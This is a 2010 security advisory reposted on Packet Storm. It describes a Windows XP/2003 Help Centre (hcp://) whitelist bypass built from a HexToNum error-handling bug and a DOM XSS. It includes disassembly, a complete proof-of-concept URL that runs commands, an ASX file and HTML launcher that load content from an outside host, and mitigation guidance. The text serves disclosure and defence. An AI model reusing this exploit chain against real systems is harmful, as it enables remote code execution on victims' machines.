Lucene search

K
packetstormTavis OrmandyPACKETSTORM:90569
HistoryJun 12, 2010 - 12:00 a.m.

Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly

2010-06-1200:00:00
Tavis Ormandy
packetstormsecurity.com
34
`Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly  
----------------------------------------------------------------------------  
  
Help and Support Centre is the default application provided to access online  
documentation for Microsoft Windows. Microsoft supports accessing help documents  
directly via URLs by installing a protocol handler for the scheme "hcp",   
a typical example is provided in the Windows XP Command Line Reference,  
available at http://technet.microsoft.com/en-us/library/bb490918.aspx.  
  
Using hcp:// URLs is intended to be safe, as when invoked via the registered  
protocol handler the command line parameter /fromhcp is passed to the help  
centre application. This flag switches the help centre into a restricted mode,  
which will only permit a whitelisted set of help documents and parameters.  
  
This design, introduced in SP2, is reasonably sound. A whitelist of trusted  
documents is a safe way of allowing interaction with the documentation from  
less-trusted sources. Unfortunately, an implementation error in the whitelist  
allows it to be evaded.  
  
URLs are normalised and unescaped prior to validation using  
MPC::HTML::UrlUnescapeW(), which in turn uses MPC::HexToNum() to translate URL  
escape sequences into their original characters, the relevant code from  
helpctr.exe 5.1.2600.5512 (latest at time of writing) is below.  
  
.text:0106684C Unescape:  
.text:0106684C cmp di, '%' ; di contains the current wchar in the input URL.  
.text:01066850 jnz short LiteralChar ; if this is not a '%', it must be a literal character.  
.text:01066852 push esi ; esi contains a pointer to the current position in URL to unescape.  
.text:01066853 call ds:wcslen ; find the remaining length.  
.text:01066859 cmp word ptr [esi], 'u' ; if the next wchar is 'u', this is a unicode escape and I need 4 xdigits.  
.text:0106685D pop ecx ; this sequence calculates the number of wchars needed (4 or 2).  
.text:0106685E setz cl ; i.e. %uXXXX (four needed), or %XX (two needed).  
.text:01066861 mov dl, cl  
.text:01066863 neg dl  
.text:01066865 sbb edx, edx  
.text:01066867 and edx, 3  
.text:0106686A inc edx  
.text:0106686B inc edx  
.text:0106686C cmp eax, edx ; test if I have enough characters in input to decode.  
.text:0106686E jl short LiteralChar ; if not enough, this '%' is considered literal.  
.text:01066870 test cl, cl  
.text:01066872 movzx eax, word ptr [esi+2]  
.text:01066876 push eax  
.text:01066877 jz short NotUnicode  
.text:01066879 call HexToNum ; call MPC::HexToNum() to convert this nibble (4 bits) to an integer.  
.text:0106687E mov edi, eax ; edi contains the running total of the value of this escape sequence.  
.text:01066880 movzx eax, word ptr [esi+4]  
.text:01066884 push eax  
.text:01066885 shl edi, 4 ; shift edi left 4 positions to make room for the next digit, i.e. total <<= 4;  
.text:01066888 call HexToNum   
.text:0106688D or edi, eax ; or the next value into the 4-bit gap, i.e. total |= val.  
.text:0106688F movzx eax, word ptr [esi+6]; this process continues for the remaining wchars.  
.text:01066893 push eax  
.text:01066894 shl edi, 4  
.text:01066897 call HexToNum  
.text:0106689C or edi, eax  
.text:0106689E movzx eax, word ptr [esi+8]  
.text:010668A2 push eax  
.text:010668A3 shl edi, 4  
.text:010668A6 call HexToNum  
.text:010668AB or edi, eax  
.text:010668AD add esi, 0Ah ; account for number of bytes (not chars) consumed by the escape.  
.text:010668B0 jmp short FinishedEscape  
.text:010668B2  
.text:010668B2 NotUnicode:   
.text:010668B2 call HexToNum ; this is the same code, but for non-unicode sequences (e.g. %41, instead of %u0041)  
.text:010668B7 mov edi, eax  
.text:010668B9 movzx eax, word ptr [esi]  
.text:010668BC push eax  
.text:010668BD call HexToNum  
.text:010668C2 shl eax, 4  
.text:010668C5 or edi, eax  
.text:010668C7 add esi, 4 ; account for number of bytes (not chars) consumed by the escape.  
.text:010668CA  
.text:010668CA FinishedEscape:  
.text:010668CA test di, di  
.text:010668CD jz short loc_10668DA  
.text:010668CF  
.text:010668CF LiteralChar:  
.text:010668CF push edi ; append the final value to the normalised string using a std::string append.  
.text:010668D0 mov ecx, [ebp+unescaped]  
.text:010668D3 push 1  
.text:010668D5 call std::string::append  
.text:010668DA mov di, [esi] ; fetch the next input character.  
.text:010668DD test di, di ; have we reached the NUL terminator?  
.text:010668E0 jnz Unescape ; process next char.  
  
This code seems sane, but an error exists due to how MPC::HexToNum() handles  
error conditions, the relevant section of code is annotated below.  
  
.text:0102D32A mov edi, edi  
.text:0102D32C push ebp  
.text:0102D32D mov ebp, esp ; function prologue.  
.text:0102D32F mov eax, [ebp+arg_0] ; fetch the character to convert.  
.text:0102D332 cmp eax, '0'  
.text:0102D335 jl short CheckUppercase ; is it a digit?  
.text:0102D337 cmp eax, '9'  
.text:0102D33A jg short CheckUppercase  
.text:0102D33C add eax, 0FFFFFFD0h ; atoi(), probably written val - '0' and optimised by compiler.  
.text:0102D33F jmp short Complete   
.text:0102D341 CheckUppercase:  
.text:0102D341 cmp eax, 'A'  
.text:0102D344 jl short CheckLowercase ; is it an uppercase xdigit?  
.text:0102D346 cmp eax, 'F'  
.text:0102D349 jg short CheckLowercase  
.text:0102D34B add eax, 0FFFFFFC9h ; atoi()  
.text:0102D34E jmp short Complete   
.text:0102D350 CheckLowercase:  
.text:0102D350 cmp eax, 'a'  
.text:0102D353 jl short Invalid ; lowercase xdigit?  
.text:0102D355 cmp eax, 'f'  
.text:0102D358 jg short Invalid   
.text:0102D35A add eax, 0FFFFFFA9h ; atoi()  
.text:0102D35D jmp short Complete   
.text:0102D35F Invalid:   
.text:0102D35F or eax, 0FFFFFFFFh ; invalid character, return -1  
.text:0102D362 Complete:   
.text:0102D362 pop ebp  
.text:0102D363 retn 4  
  
Thus, MPC::HTML::UrlUnescapeW() does not check the return code of  
MPC::HexToNum() as required, and therefore can be manipulated into appending  
unexpected garbage onto std::strings. This error may appear benign, but we can  
use the miscalculations produced later in the code to evade the /fromhcp  
whitelist.  
  
Assuming that we can access arbitrary help documents (full details of how the  
MPC:: error can be used to accomplish this will be explained below), we must  
identify a document that can be controlled purely from the URL used to access it.  
  
After browsing the documents available in a typical installation, the author  
concluded the only way to do this would be a cross site scripting error. After  
some careful searching, a candidate was discovered:  
  
hcp://system/sysinfo/sysinfomain.htm?svr=<h1>test</h1>  
  
This document is available in a default installation, and due to insufficient  
escaping in GetServerName() from sysinfo/commonFunc.js, the page is vulnerable  
to a DOM-type XSS. However, the escaping routine will abort encoding if characters  
such as '=' or '"' or others are specified.   
  
It's not immediately obvious that this error is still exploitable, simple  
tricks like <img src=bad onerror=code> don't apply, and <script>code</script>  
isn't helpful as the code isn't evaluated again. In situations like this, the  
best course of action is to harass lcamtuf until he gives you the solution,  
which of course his encyclopaedic knowledge of browser security quirks produced  
immediately.  
  
<script defer>code</script>  
  
The defer property is an IE-ism which solves the problem, documented by  
Microsoft here http://msdn.microsoft.com/en-us/library/ms533719%28VS.85%29.aspx.  
Now that we are armed with knowledge of this trick, because these help  
documents are in a privileged zone, we can simply execute commands.  
  
You can test this with a command like so (assuming a recent IE):  
  
C:\> ver  
Microsoft Windows XP [Version 5.1.2600]  
C:\> c:\windows\pchealth\helpctr\binaries\helpctr.exe -url "hcp://system/sysinfo/sysinfomain.htm?svr=<script defer>eval(unescape('Run%28%22calc.exe%22%29'))</script>"  
C:\>  
  
While this is fun, this isn't a vulnerability unless an untrusted third party  
can force you to access it. Testing suggests that by default, accessing an  
hcp:// URL from within Internet Explorer >= 8, Firefox, Chrome (and presumably  
other browsers) will result in a prompt. Although most users will click through  
this prompt (perfectly reasonable, protocol handlers are intended to be safe),  
it's not a particularly exciting attack.  
  
I've found a way to avoid the prompt in a default Windows XP installation in all  
major browsers, The solution is to invoke the protocol handler from within an  
<iframe> in an ASX HtmlView element. There are probably other ways.  
  
http://en.wikipedia.org/wiki/Advanced_Stream_Redirector  
  
The version of Windows Media Player that is available by default in Windows XP  
is WMP9, which installs an NPAPI and ActiveX plugin to render windows media  
content. Later versions also can be used, with some minor complications.  
  
Thus, the attack will look like this:  
  
$ cat simple.asx   
<ASX VERSION="3.0">  
<PARAM name="HTMLView" value="http://lock.cmpxchg8b.com/b10a58b75029f79b5f93f4add3ddf992/starthelp.html"/>  
<ENTRY>  
<REF href="http://lock.cmpxchg8b.com/b10a58b75029f79b5f93f4add3ddf992/bug-vs-feature.jpg"/>  
</ENTRY>  
</ASX>  
  
Where starthelp.html contains something like:  
  
$ cat starthelp.html   
<iframe src="hcp://...">  
  
Forcing a user to read an .ASX file can be achieved in a cross-browser manner like so:  
  
$ cat launchurl.html   
<html>  
<head><title>Testing HCP</title></head>  
<body>  
<h1>OK</h1>  
<script>  
// HCP:// Vulnerability, Tavis Ormandy, June 2010.  
var asx = "http://lock.cmpxchg8b.com/b10a58b75029f79b5f93f4add3ddf992/simple.asx";  
  
if (window.navigator.appName == "Microsoft Internet Explorer") {  
// Internet Explorer  
var o = document.createElement("OBJECT");  
o.setAttribute("classid", "clsid:6BF52A52-394A-11d3-B153-00C04F79FAA6");  
o.openPlayer(asx);  
} else {  
// Mozilla, Chrome, Etc.  
var o = document.createElement("IFRAME");  
o.setAttribute("src", asx);  
document.body.appendChild(o);  
}  
</script>  
</body>  
</html>  
  
Therefore, we have the following interactions between multiple complex systems  
chained together:  
  
- From an html page, email, document, or other application force a user to  
fetch a .ASX file containing an HtmlView element.  
- From the HtmlView element, invoke the hcp protocol handler that would normally  
require confirmation.  
- From the HCP Protocol handler, bypass the /fromhcp whitelist by using the  
string miscalculations caused by failing to check the return code of  
MPC::HexToNum().  
- Once the whitelist has been defeated, invoke the Help document with a known  
DOM XSS due to GetServerName() insufficient escaping.  
- Use the defer property of a script tag to execute script in a privileged zone  
even after the page has been rendered.  
- Invoke an arbitrary command using the wscript.shell object.  
  
Figuring out how to use the MCP::HexToNum() error to defeat the /fromhcp  
whitelist took some analysis, but the result looks like the following.  
  
hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%  
A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%  
%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A  
%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%  
A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=%3  
Cscript%20defer%3Eeval%28unescape%28%27Run%2528%2522calc.exe%2522%2529%27%29%29%  
3C/script%3E  
  
--------------------  
Affected Software  
------------------------  
  
At least Microsoft Windows XP, and Windows Server 2003 are affected. The attack  
is enhanced against IE >= 8 and other major browsers if Windows Media Player is  
available, but an installation is still vulnerable without it.  
  
Machines running version of IE less than 8 are, as usual, in even more trouble.  
  
In general, choice of browser, mail client or whatever is not relevant, they  
are all equally vulnerable.  
  
--------------------  
Consequences  
-----------------------  
  
Upon successful exploitation, a remote attacker is able to execute arbitrary  
commands with the privileges of the current user.  
  
I've prepared a demonstration for a typical Windows XP installation with  
Internet Explorer 8, and the default Windows Media Player 9.  
  
http://lock.cmpxchg8b.com/b10a58b75029f79b5f93f4add3ddf992/launchurl.html  
  
In IE7 on Windows XP, just visiting this URL should be sufficient:  
  
http://lock.cmpxchg8b.com/b10a58b75029f79b5f93f4add3ddf992/starthelp.html  
  
Some minor modifications will be required to target other configurations, this  
is simply an attempt to demonstrate the problem. I'm sure the smart guys at  
metasploit will work on designing reliable attacks, as security professionals  
require these to do their jobs.  
  
Additionally, my demonstration is not intended to be stealthy, a real  
attack would barely be noticable to the victim. Perhaps the only unavoidable  
signal would be the momentary appearance of the Help Centre window before the  
attacker hides it. There are multiple trivial techniques that can be used to  
accomplish this.  
  
Browsers are useful to demonstrate the problem, but there are certainly other  
attack vectors, such as MUAs, documents, etc. Protocol handlers are designed to  
be used across applications.  
  
-------------------  
Mitigation  
-----------------------  
  
If you believe you may be affected, you should consider applying one of the  
workarounds described below.  
  
Few users rely on Help Centre urls, it is safe to temporarily disable them  
by removing HKCR\HCP\shell\open. This modification can be deployed easily using  
GPOs. For more information on Group Policy, see Microsoft's Group Policy site,  
here  
  
http://technet.microsoft.com/en-us/windowsserver/bb310732.aspx  
  
A few caveats,   
  
* I am aware that some support technicians rely on the Remote Assistance  
tool provided by the Help Center application using shortcuts like  
"explorer.exe hcp://CN=Microsoft%20Corporation,L=Re...". You can continue  
to use this technique by substituting "explorer.exe hcp://..." for  
"helpctr.exe /url hcp://...", without relying on the protocol handler.  
  
* One or two links in explorer, such as selecting "Help" from the Control  
Panel category view, may no longer function. If this concerns you, it is  
possible to gracefully degrade by replacing the protocol handler with a  
command to open a static intranet support page, e.g.  
"chrome.exe http://techsupport.intranet".  
  
* As always, if you do not use this feature, consider permanently disabling  
it in order to reduce attack surface. Historically, disabling unused  
protocol handlers has always proven to be a wise investment in security.   
  
In the unlikely event that you heavily rely on the use of hcp://, I have  
created an unofficial (temporary) hotfix. You may use it under the terms of  
the GNU General Public License, version 2 or later. Of course, you should only  
use it as a last resort, carefully test the patch and make sure you understand  
what it does (full source code is included). It may be necessary to modify it  
to fit your needs.  
  
The package is availble for x86 here:  
  
http://lock.cmpxchg8b.com/b10a58b75029f79b5f93f4add3ddf992/hcphotfix.zip  
  
[ NOTE: Please avoid linking to this file out of context, it is intended for  
consideration as a potential mitigation by experienced administrators,  
and is not suitable for consumption by end-users ]  
  
The hotfix intercepts helpctr.exe invokations, and patches MPC::HexToNum() to  
return zero on error, rather than -1. Nothing is changed on disk, and it can be  
safely removed at anytime. Of course, the result of an invalid unescape is still  
incorrect, but this specific vulnerability should be rendered inert. I would be  
greatful if the community could contribute bugfixes, testing, an x64 port, and  
so on. Once information is in the open, we can all collaborate on our  
collective security.  
  
Some clarifications,  
  
* Fixing the XSS is not a solution, the root cause is the whitelist  
evasion, any mitigation that does not address this is simply papering  
over the issue. An army of researchers that specialise in XSS exists, and  
i'm sure they will turn their attention to help documents once they  
realise their value. Assume more will be discovered.  
  
* That said, if you are an XSS expert, examples in whitelisted pages  
(/services/index, /services/search, etc.) would be useful, your skills  
could be helpful making this important software safe.  
  
* Removing Windows Media player is not a solution, it simply makes a fun  
demo for IE8 and other modern browsers.  
  
Finally, you should take this opportunity to disable all browser plugins and  
SFS ActiveX controls that are not regularly used. End users can do this  
themselves in Google Chrome by viewing about:plugins and disabling the plugins  
that are not required. In Mozilla Firefox, use the Tools->Add-ons->Plugins  
interface.  
  
-------------------  
Solution  
-----------------------  
  
Microsoft was informed about this vulnerability on 5-Jun-2010, and they  
confirmed receipt of my report on the same day.  
  
Protocol handlers are a popular source of vulnerabilities, and hcp:// itself  
has been the target of attacks multiple times in the past. I've concluded that  
there's a significant possibility that attackers have studied this component,  
and releasing this information rapidly is in the best interest of security.  
  
Those of you with large support contracts are encouraged to tell your support  
representatives that you would like to see Microsoft invest in developing  
processes for faster responses to external security reports.  
  
-------------------  
Credit  
-----------------------  
  
This bug was discovered by Tavis Ormandy.  
  
-------------------  
Greetz  
-----------------------  
  
Greetz to Neel, Mark, Redpig, Spoonm, Skylined, asiraP, LiquidK, ScaryBeasts,  
Hawkes, Jagger, and all my other pimp colleagues.  
  
Special thanks to lcamtuf for his assistance with the deferred execution  
problem. You should read his Browser Security Handbook if you need to  
understand how web browser security /really/ works.  
  
http://code.google.com/p/browsersec/wiki/Main  
  
A colleague is organising a conference in Lucerne, Switzerland. He would really  
appreciate interesting papers from security people who want to talk about  
their research (travel, hotel, etc. covered).  
  
https://www.hashdays.ch/  
  
-------------------  
Notes  
-----------------------  
  
I would like to point out that if I had reported the MPC::HexToNum() issue  
without a working exploit, I would have been ignored.  
  
Without access to extremely smart colleagues, I would likely have given up,  
leaving you vulnerable to attack from those who just want root on your network  
and do not care about disclosure policies.  
  
This is another example of the problems with bug secrecy (or in PR speak,  
"responsible disclosure"), those of us who work hard to keep networks safe are  
forced to work in isolation without the open collaboration with our peers that  
we need, especially in complex cases like this, where creative thinking and  
input from experts in multiple disciplines is required to join the dots.  
  
A good place to start researching full disclosure would be this accessible  
and insightful essay by Bruce Schneier.  
  
http://www.schneier.com/essay-146.html  
  
His balanced coverage of the debate is also available in this essay.  
  
http://www.schneier.com/crypto-gram-0111.html#1  
  
Finally, a reminder that this documents contains my own opinions, I do  
not speak for or represent anyone but myself.  
  
-------------------  
References  
-----------------------  
  
hcp:// has been broken a few times over the years, for example:  
  
- http://seclists.org/bugtraq/2002/Aug/225, Delete arbitrary files using Help and Support Center  
- http://www.microsoft.com/technet/security/bulletin/ms03-044.mspx, HCP memory corruption by Dave Litchfield.  
  
The current design is actually pretty sound, I'm sure Microsoft are  
dissapointed they missed this flaw. In their defense, I think there's a good  
chance I would have also missed this in code review.  
  
--   
-------------------------------------  
[email protected] | pgp encrypted mail preferred  
-------------------------------------------------------  
`